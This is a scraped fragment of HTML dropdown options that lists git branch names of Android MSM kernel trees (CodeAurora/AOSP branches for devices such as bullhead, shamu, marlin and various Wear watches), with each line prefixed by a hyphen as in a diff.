-<option value='caf/3.10/caf/aosp-new/android-msm-anthias-3.10-marshmallow-mr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-anthias-3.10-marshmallow-mr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-asus-3.10-lollipop-mr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-asus-3.10-lollipop-mr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-asus-3.10-marshmallow-mr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-asus-3.10-marshmallow-mr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-asus-3.10-nougat-mr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-asus-3.10-nougat-mr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bass-3.10-lollipop-mr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-bass-3.10-lollipop-mr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bass-3.10-marshmallow-dr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-bass-3.10-marshmallow-dr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bass-3.10-marshmallow-mr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-bass-3.10-marshmallow-mr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bass-3.10-marshmallow-mr1-wear-release-1'>caf/3.10/caf/aosp-new/android-msm-bass-3.10-marshmallow-mr1-wear-release-1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bass-3.10-nougat-mr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-bass-3.10-nougat-mr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bluegill-3.18-nougat-mr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-bluegill-3.18-nougat-mr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-marshmallow-dr'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-marshmallow-dr</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-marshmallow-dr-0'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-marshmallow-dr-0</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-marshmallow-dr1.5'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-marshmallow-dr1.5</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-marshmallow-dr1.6'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-marshmallow-dr1.6</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-marshmallow-mr1'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-marshmallow-mr1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-marshmallow-mr1-eas'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-marshmallow-mr1-eas</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-marshmallow-mr2'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-marshmallow-mr2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-n-mr1-preview-1'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-n-mr1-preview-1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-n-mr1-preview-2'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-n-mr1-preview-2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-n-mr2-preview-1'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-n-mr2-preview-1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-n-mr2-preview-2'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-n-mr2-preview-2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-n-preview-1'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-n-preview-1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-n-preview-2'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-n-preview-2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-n-preview-3'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-n-preview-3</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-n-preview-4'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-n-preview-4</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-n-preview-5'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-n-preview-5</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-nougat'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-nougat</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-nougat-bugfix'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-nougat-bugfix</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-nougat-hwbinder'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-nougat-hwbinder</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-nougat-mr0.5'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-nougat-mr0.5</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-nougat-mr0.6'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-nougat-mr0.6</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-nougat-mr1'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-nougat-mr1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-nougat-mr1.1'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-nougat-mr1.1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-o-preview-1'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-o-preview-1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-o-preview-2'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-o-preview-2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-o-preview-3'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-o-preview-3</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-o-preview-4'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-o-preview-4</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-oreo-r4'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-oreo-r4</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-oreo-r6'>caf/3.10/caf/aosp-new/android-msm-bullhead-3.10-oreo-r6</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-dorado-3.18-marshmallow-mr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-dorado-3.18-marshmallow-mr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-dorado-3.18-nougat-mr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-dorado-3.18-nougat-mr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-dory-3.10-kitkat-wear'>caf/3.10/caf/aosp-new/android-msm-dory-3.10-kitkat-wear</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-dory-3.10-lollipop-mr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-dory-3.10-lollipop-mr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-dory-3.10-lollipop-wear-release'>caf/3.10/caf/aosp-new/android-msm-dory-3.10-lollipop-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-dory-3.10-marshmallow-dr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-dory-3.10-marshmallow-dr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-dory-3.10-marshmallow-mr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-dory-3.10-marshmallow-mr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-flo-3.4-jb-mr2'>caf/3.10/caf/aosp-new/android-msm-flo-3.4-jb-mr2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-flo-3.4-kitkat-mr0'>caf/3.10/caf/aosp-new/android-msm-flo-3.4-kitkat-mr0</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-flo-3.4-kitkat-mr1'>caf/3.10/caf/aosp-new/android-msm-flo-3.4-kitkat-mr1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-flo-3.4-kitkat-mr2'>caf/3.10/caf/aosp-new/android-msm-flo-3.4-kitkat-mr2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-flo-3.4-l-preview'>caf/3.10/caf/aosp-new/android-msm-flo-3.4-l-preview</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-flo-3.4-lollipop-mr1'>caf/3.10/caf/aosp-new/android-msm-flo-3.4-lollipop-mr1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-flo-3.4-lollipop-mr1.1'>caf/3.10/caf/aosp-new/android-msm-flo-3.4-lollipop-mr1.1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-flo-3.4-lollipop-mr1.2'>caf/3.10/caf/aosp-new/android-msm-flo-3.4-lollipop-mr1.2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-flo-3.4-lollipop-release'>caf/3.10/caf/aosp-new/android-msm-flo-3.4-lollipop-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-flo-3.4-marshmallow'>caf/3.10/caf/aosp-new/android-msm-flo-3.4-marshmallow</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-flo-3.4-marshmallow-mr1'>caf/3.10/caf/aosp-new/android-msm-flo-3.4-marshmallow-mr1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-flo-3.4-marshmallow-mr2'>caf/3.10/caf/aosp-new/android-msm-flo-3.4-marshmallow-mr2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-gar-3.18-marshmallow-dr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-gar-3.18-marshmallow-dr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-gar-3.18-marshmallow-mr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-gar-3.18-marshmallow-mr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-glowlight-3.18-nougat-dr-wear-release'>caf/3.10/caf/aosp-new/android-msm-glowlight-3.18-nougat-dr-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-hammerhead-3.4-kitkat-mr1'>caf/3.10/caf/aosp-new/android-msm-hammerhead-3.4-kitkat-mr1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-hammerhead-3.4-kitkat-mr2'>caf/3.10/caf/aosp-new/android-msm-hammerhead-3.4-kitkat-mr2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-hammerhead-3.4-kk-fr1'>caf/3.10/caf/aosp-new/android-msm-hammerhead-3.4-kk-fr1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-hammerhead-3.4-kk-fr2'>caf/3.10/caf/aosp-new/android-msm-hammerhead-3.4-kk-fr2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-hammerhead-3.4-kk-r1'>caf/3.10/caf/aosp-new/android-msm-hammerhead-3.4-kk-r1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-hammerhead-3.4-l-preview'>caf/3.10/caf/aosp-new/android-msm-hammerhead-3.4-l-preview</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-hammerhead-3.4-lollipop-mr1'>caf/3.10/caf/aosp-new/android-msm-hammerhead-3.4-lollipop-mr1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-hammerhead-3.4-lollipop-mr1.1'>caf/3.10/caf/aosp-new/android-msm-hammerhead-3.4-lollipop-mr1.1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-hammerhead-3.4-lollipop-release'>caf/3.10/caf/aosp-new/android-msm-hammerhead-3.4-lollipop-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-hammerhead-3.4-m-preview'>caf/3.10/caf/aosp-new/android-msm-hammerhead-3.4-m-preview</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-hammerhead-3.4-marshmallow'>caf/3.10/caf/aosp-new/android-msm-hammerhead-3.4-marshmallow</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-hammerhead-3.4-marshmallow-mr1'>caf/3.10/caf/aosp-new/android-msm-hammerhead-3.4-marshmallow-mr1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-hammerhead-3.4-marshmallow-mr2'>caf/3.10/caf/aosp-new/android-msm-hammerhead-3.4-marshmallow-mr2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-hammerhead-3.4-marshmallow-mr3'>caf/3.10/caf/aosp-new/android-msm-hammerhead-3.4-marshmallow-mr3</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-huawei-3.10-lollipop-mr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-huawei-3.10-lollipop-mr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-huawei-3.10-lollipop-mr1-wear-release-1'>caf/3.10/caf/aosp-new/android-msm-huawei-3.10-lollipop-mr1-wear-release-1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-huawei-3.10-marshmallow-mr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-huawei-3.10-marshmallow-mr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-huawei-3.10-marshmallow-mr1-wear-release-1'>caf/3.10/caf/aosp-new/android-msm-huawei-3.10-marshmallow-mr1-wear-release-1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-huawei-3.10-marshmallow-mr1-wear-release-2'>caf/3.10/caf/aosp-new/android-msm-huawei-3.10-marshmallow-mr1-wear-release-2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-lego-3.10-marshmallow-dr'>caf/3.10/caf/aosp-new/android-msm-lego-3.10-marshmallow-dr</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-lenok-3.10-kitkat-wear'>caf/3.10/caf/aosp-new/android-msm-lenok-3.10-kitkat-wear</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-lenok-3.10-lollipop-mr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-lenok-3.10-lollipop-mr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-lenok-3.10-lollipop-wear-release'>caf/3.10/caf/aosp-new/android-msm-lenok-3.10-lollipop-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-lenok-3.10-marshmallow-mr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-lenok-3.10-marshmallow-mr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-lionfish-3.18-nougat-mr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-lionfish-3.18-nougat-mr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-mako-3.4-jb-mr1'>caf/3.10/caf/aosp-new/android-msm-mako-3.4-jb-mr1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-mako-3.4-jb-mr1-fr'>caf/3.10/caf/aosp-new/android-msm-mako-3.4-jb-mr1-fr</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-mako-3.4-jb-mr1-kgsl'>caf/3.10/caf/aosp-new/android-msm-mako-3.4-jb-mr1-kgsl</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-mako-3.4-jb-mr1.1'>caf/3.10/caf/aosp-new/android-msm-mako-3.4-jb-mr1.1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-mako-3.4-jb-mr2'>caf/3.10/caf/aosp-new/android-msm-mako-3.4-jb-mr2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-mako-3.4-kitkat-mr0'>caf/3.10/caf/aosp-new/android-msm-mako-3.4-kitkat-mr0</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-mako-3.4-kitkat-mr1'>caf/3.10/caf/aosp-new/android-msm-mako-3.4-kitkat-mr1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-mako-3.4-kitkat-mr2'>caf/3.10/caf/aosp-new/android-msm-mako-3.4-kitkat-mr2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-mako-3.4-lollipop-mr1'>caf/3.10/caf/aosp-new/android-msm-mako-3.4-lollipop-mr1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-mako-3.4-lollipop-mr1.1'>caf/3.10/caf/aosp-new/android-msm-mako-3.4-lollipop-mr1.1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-mako-3.4-lollipop-release'>caf/3.10/caf/aosp-new/android-msm-mako-3.4-lollipop-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-marlin-3.18-n-mr1-preview-2'>caf/3.10/caf/aosp-new/android-msm-marlin-3.18-n-mr1-preview-2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-marlin-3.18-n-mr2-preview-1'>caf/3.10/caf/aosp-new/android-msm-marlin-3.18-n-mr2-preview-1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-marlin-3.18-n-mr2-preview-2'>caf/3.10/caf/aosp-new/android-msm-marlin-3.18-n-mr2-preview-2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-marlin-3.18-nougat-dr1'>caf/3.10/caf/aosp-new/android-msm-marlin-3.18-nougat-dr1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-marlin-3.18-nougat-hwbinder'>caf/3.10/caf/aosp-new/android-msm-marlin-3.18-nougat-hwbinder</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-marlin-3.18-nougat-mr1'>caf/3.10/caf/aosp-new/android-msm-marlin-3.18-nougat-mr1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-marlin-3.18-nougat-mr1-eas-experimental'>caf/3.10/caf/aosp-new/android-msm-marlin-3.18-nougat-mr1-eas-experimental</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-marlin-3.18-nougat-mr1.3'>caf/3.10/caf/aosp-new/android-msm-marlin-3.18-nougat-mr1.3</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-marlin-3.18-nougat-mr2'>caf/3.10/caf/aosp-new/android-msm-marlin-3.18-nougat-mr2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-marlin-3.18-nougat-mr2-pixel'>caf/3.10/caf/aosp-new/android-msm-marlin-3.18-nougat-mr2-pixel</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-marlin-3.18-nougat-mr2.1'>caf/3.10/caf/aosp-new/android-msm-marlin-3.18-nougat-mr2.1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-marlin-3.18-nougat-mr2.2'>caf/3.10/caf/aosp-new/android-msm-marlin-3.18-nougat-mr2.2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-marlin-3.18-nougat-mr2.3'>caf/3.10/caf/aosp-new/android-msm-marlin-3.18-nougat-mr2.3</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-marlin-3.18-o-preview-1'>caf/3.10/caf/aosp-new/android-msm-marlin-3.18-o-preview-1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-marlin-3.18-o-preview-2'>caf/3.10/caf/aosp-new/android-msm-marlin-3.18-o-preview-2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-marlin-3.18-o-preview-3'>caf/3.10/caf/aosp-new/android-msm-marlin-3.18-o-preview-3</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-marlin-3.18-o-preview-4'>caf/3.10/caf/aosp-new/android-msm-marlin-3.18-o-preview-4</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-marlin-3.18-oreo'>caf/3.10/caf/aosp-new/android-msm-marlin-3.18-oreo</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-marlin-3.18-oreo-r3'>caf/3.10/caf/aosp-new/android-msm-marlin-3.18-oreo-r3</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-marlin-3.18-oreo-r6'>caf/3.10/caf/aosp-new/android-msm-marlin-3.18-oreo-r6</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-moto-3.10-lollipop-mr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-moto-3.10-lollipop-mr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-mullet-3.18-nougat-dr1-wear'>caf/3.10/caf/aosp-new/android-msm-mullet-3.18-nougat-dr1-wear</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-nemo-3.10-marshmallow-dr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-nemo-3.10-marshmallow-dr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-nemo-3.10-marshmallow-mr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-nemo-3.10-marshmallow-mr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-nemo-3.10-n-preview-1-wear-release'>caf/3.10/caf/aosp-new/android-msm-nemo-3.10-n-preview-1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-nemo-3.10-n-preview-2-wear-release'>caf/3.10/caf/aosp-new/android-msm-nemo-3.10-n-preview-2-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-nemo-3.10-n-preview-3-wear-release'>caf/3.10/caf/aosp-new/android-msm-nemo-3.10-n-preview-3-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-nemo-3.10-n-preview-4-wear-release'>caf/3.10/caf/aosp-new/android-msm-nemo-3.10-n-preview-4-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-platy-3.18-nougat-mr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-platy-3.18-nougat-mr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-sawshark-3.18-nougat-mr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-sawshark-3.18-nougat-mr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-sawshark-3.18-nougat-mr1-wear-release-1'>caf/3.10/caf/aosp-new/android-msm-sawshark-3.18-nougat-mr1-wear-release-1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-sawshark-3.18-o-wear-preview-4'>caf/3.10/caf/aosp-new/android-msm-sawshark-3.18-o-wear-preview-4</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-sculpin-3.18-marshmallow-dr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-sculpin-3.18-marshmallow-dr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-sculpin-3.18-marshmallow-mr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-sculpin-3.18-marshmallow-mr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-sculpin-3.18-nougat-mr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-sculpin-3.18-nougat-mr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-seed-3.10-lollipop-mr1'>caf/3.10/caf/aosp-new/android-msm-seed-3.10-lollipop-mr1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-seed-3.10-marshmallow'>caf/3.10/caf/aosp-new/android-msm-seed-3.10-marshmallow</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-seed-3.10-marshmallow-mr1'>caf/3.10/caf/aosp-new/android-msm-seed-3.10-marshmallow-mr1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-seed-3.10-marshmallow-mr2'>caf/3.10/caf/aosp-new/android-msm-seed-3.10-marshmallow-mr2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-seed-3.10-n-mr1-preview-2'>caf/3.10/caf/aosp-new/android-msm-seed-3.10-n-mr1-preview-2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-seed-3.10-n-preview-2'>caf/3.10/caf/aosp-new/android-msm-seed-3.10-n-preview-2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-seed-3.10-n-preview-3'>caf/3.10/caf/aosp-new/android-msm-seed-3.10-n-preview-3</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-seed-3.10-n-preview-4'>caf/3.10/caf/aosp-new/android-msm-seed-3.10-n-preview-4</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-seed-3.10-n-preview-5'>caf/3.10/caf/aosp-new/android-msm-seed-3.10-n-preview-5</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-seed-3.10-nougat'>caf/3.10/caf/aosp-new/android-msm-seed-3.10-nougat</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-seed-3.10-nougat-mr1'>caf/3.10/caf/aosp-new/android-msm-seed-3.10-nougat-mr1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-seed-3.10-nougat-mr1.1'>caf/3.10/caf/aosp-new/android-msm-seed-3.10-nougat-mr1.1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-shamrock-3.10-nougat-mr1-release'>caf/3.10/caf/aosp-new/android-msm-shamrock-3.10-nougat-mr1-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-shamrock-3.10-nougat-release'>caf/3.10/caf/aosp-new/android-msm-shamrock-3.10-nougat-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-shamu-3.10-lollipop-mr1'>caf/3.10/caf/aosp-new/android-msm-shamu-3.10-lollipop-mr1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-shamu-3.10-lollipop-release'>caf/3.10/caf/aosp-new/android-msm-shamu-3.10-lollipop-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-shamu-3.10-m-preview'>caf/3.10/caf/aosp-new/android-msm-shamu-3.10-m-preview</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-shamu-3.10-marshmallow'>caf/3.10/caf/aosp-new/android-msm-shamu-3.10-marshmallow</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-shamu-3.10-marshmallow-mr1'>caf/3.10/caf/aosp-new/android-msm-shamu-3.10-marshmallow-mr1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-shamu-3.10-marshmallow-mr1-r0.15'>caf/3.10/caf/aosp-new/android-msm-shamu-3.10-marshmallow-mr1-r0.15</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-shamu-3.10-marshmallow-mr2'>caf/3.10/caf/aosp-new/android-msm-shamu-3.10-marshmallow-mr2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-shamu-3.10-n-preview-1'>caf/3.10/caf/aosp-new/android-msm-shamu-3.10-n-preview-1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-shamu-3.10-n-preview-2'>caf/3.10/caf/aosp-new/android-msm-shamu-3.10-n-preview-2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-shamu-3.10-n-preview-3'>caf/3.10/caf/aosp-new/android-msm-shamu-3.10-n-preview-3</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-shamu-3.10-n-preview-4'>caf/3.10/caf/aosp-new/android-msm-shamu-3.10-n-preview-4</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-shamu-3.10-n-preview-5'>caf/3.10/caf/aosp-new/android-msm-shamu-3.10-n-preview-5</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-shamu-3.10-nougat-bugfix'>caf/3.10/caf/aosp-new/android-msm-shamu-3.10-nougat-bugfix</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-shamu-3.10-nougat-mr0.5'>caf/3.10/caf/aosp-new/android-msm-shamu-3.10-nougat-mr0.5</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-shamu-3.10-nougat-mr1.2'>caf/3.10/caf/aosp-new/android-msm-shamu-3.10-nougat-mr1.2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-shamu-3.10-nougat-mr1.5'>caf/3.10/caf/aosp-new/android-msm-shamu-3.10-nougat-mr1.5</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-shamu-3.10-nougat-mr1.6'>caf/3.10/caf/aosp-new/android-msm-shamu-3.10-nougat-mr1.6</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-shamu-3.10-nougat-mr1.7'>caf/3.10/caf/aosp-new/android-msm-shamu-3.10-nougat-mr1.7</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-shiner-3.18-nougat-dr-wear-release'>caf/3.10/caf/aosp-new/android-msm-shiner-3.18-nougat-dr-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-smelt-3.10-lollipop-mr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-smelt-3.10-lollipop-mr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-smelt-3.10-marshmallow-mr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-smelt-3.10-marshmallow-mr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-sony-cm-jb-3.0'>caf/3.10/caf/aosp-new/android-msm-sony-cm-jb-3.0</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-sparrow-3.10-marshmallow-mr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-sparrow-3.10-marshmallow-mr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-sprat-3.10-kitkat-wear'>caf/3.10/caf/aosp-new/android-msm-sprat-3.10-kitkat-wear</option>
